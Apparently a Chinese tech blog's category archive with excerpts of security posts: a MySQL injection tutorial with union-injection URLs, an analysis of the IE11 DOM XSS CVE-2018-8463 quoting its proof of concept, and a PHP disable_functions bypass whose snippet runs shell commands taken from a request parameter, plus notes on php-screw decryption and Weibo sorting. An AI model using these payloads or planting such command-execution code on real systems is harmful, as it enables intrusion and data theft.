分类目录归档:技术随笔

技术随笔-随手记录一些生活中用到的技术

珂技系列之一篇就够了——mysql注入

freebuf看到的,总结挺全,备份留着方便自己找吧

原文:https://www.freebuf.com/articles/web/261524.html

因为以前被盗过文,所以想了想干脆都发到这里,免得再被盗。

原文最初是发给公司同事看的,后来首发于本人公众号。

一、 Sql注入是什么?如何产生的?危害有哪些?

现在的web大多是前后端分离,在固定前端页面上,通过不同参数去调用数据库的内容而显示不一样内容。这种情况下传入恶意参数,通过拼接在sql语句上,导致攻击者可以操作数据库,获得敏感数据或者直接命令执行,危害极大。
最常见的sql注入。

http://127.0.0.1/news.php?id=1
select * from news where id = $id;
http://127.0.0.1/news.php?id=1 and 1=1
select * from news where id = 1 and 1=1

二、 SQL注入有多少种?

从回显内容上来看,SQL注入只分为联合注入,报错注入,盲注,堆叠注入。

1,联合注入

在联合注入中是使用了union select联合查询,通常用来拼接在where后面,如下。

http://127.0.0.1/news.php?id=1 http://127.0.0.1/news.php?id=1 order by 4 http://127.0.0.1/news.php?id=-1 union select 1,2,3,4 
http://127.0.0.1/news.php?id=-1 union select user(),2,3,4

sql语句为。

select * from news where id = $id; 
select * from news where id = 1 order by 4
select * from news where id = -1 union select 1,2,3,4
select * from news where id = -1 union select user(),2,3,4
继续阅读

CVE-2018-8463漏洞分析与利用

CVE-2018-8463漏洞是一个基于IE 11浏览器内置dll资源中包含htm的一个dom 类型xss。

根据exploitdb上的细节,我们发现,poc为:
res://apds.dll/redirect.html?target=javascript:alert(1)//edgehtml.dll/flags.htm

针对dll资源文件检索,我们可以利用ResourcesExtract工具进行搜索
筛选出我们存在xss漏洞的html: 继续阅读

php disable_functions bypass

PHP 4 >= 4.2.0, PHP 5 pcntl_exec

<?php
$dir = '/var/tmp/';
$cmd = 'ls';
$option = '-l';
$pathtobin = '/bin/bash';
 
$arg = array($cmd, $option, $dir);
 
pcntl_exec($pathtobin, $arg);
echo '123';
?>
<?php
$cmd = @$_REQUEST[cmd];
if(function_exists('pcntl_exec')) {
    $cmd = $cmd."&pkill -9 bash >out";
    pcntl_exec("/bin/bash", $cmd);
    echo file_get_contents("out");        
} else {
        echo '不支持pcntl扩展';
}
?>

继续阅读

关于php-screw 解密

最近同事遇到了screw加密的问题,之前也没接触过这款加密扩展,便上网搜了下解决办法,顺便在这里记录一下,以便以后能用到。

情况复原,了解了下之后去官网把扩展下回来,把环境搭建起来了:
官网:https://sourceforge.net/projects/php-screw/

下回来之后make编译一下,编译好了之后,这款加密程序加密之后会生成对应后缀的文件,譬如1.php,加密之后就会替换掉1.php,而源文件(未加密的)则会更名为:1.php.screw

在github上找到对应的解密程序:https://github.com/firebroo/screw_decode

下载解密程序并编译:
git clone https://github.com/firebroo/screw_decode.git
make

继续阅读

小技巧–通过搜索来显示正常的新浪微博排序

不知道从什么时候开始,新浪微博客户端不再是和以前那样,按照时间线的顺序来排序微博了,用起来非常郁闷。经常刷了好几次微博依然都是几个小时甚至是几天以前的。能否通过一些技巧来重新让以前的排序回到我们的微博呢?目前从微博上了解到是可以的。

以我iphone客户端为例,先点击发现(其实就是搜索)

sousuo

 

点击之后,通过输入… : 继续阅读